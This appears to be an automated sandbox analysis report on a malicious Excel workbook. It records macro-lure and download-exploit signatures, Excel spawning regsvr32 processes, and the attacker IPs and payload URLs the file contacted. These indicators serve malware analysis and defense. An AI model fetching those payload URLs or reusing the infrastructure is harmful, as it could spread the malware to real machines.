behaviorgraph top1 signatures2 2 Behavior Graph ID: 532933 Sample: ClaimCopy-355714047-12022021.xlsb Startdate: 02/12/2021 Architecture: WINDOWS Score: 76 29 Multi AV Scanner detection for submitted file 2->29 31 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->31 33 Sigma detected: Microsoft Office Product Spawning Windows Shell 2->33 35 3 other signatures 2->35 6 EXCEL.EXE 30 21 2->6         started        process3 dnsIp4 23 45.142.211.62, 80 RACKTECHRU Russian Federation 6->23 25 158.69.133.78, 49167, 49175, 80 OVHFR Canada 6->25 27 185.82.126.78, 80 MAKONIXLV Latvia 6->27 19 C:\...\~$ClaimCopy-355714047-12022021.xlsb, data 6->19 dropped 21 ClaimCopy-35571404...22021.xlsbE. (copy), Microsoft 6->21 dropped 37 Document exploit detected (UrlDownloadToFile) 6->37 11 regsvr32.exe 6->11         started        13 regsvr32.exe 6->13         started        15 regsvr32.exe 6->15         started        17 3 other processes 6->17 file5 signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.142.211.62
 unknown Russian Federation
208861 RACKTECHRU false
158.69.133.78
 unknown Canada
16276 OVHFR false
185.82.126.78
 unknown Latvia
52173 MAKONIXLV false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://158.69.133.78/574766024224.dat2 false
  • Avira URL Cloud: safe
 unknown
http://158.69.133.78/574766024224.dat false
  • Avira URL Cloud: safe
 unknown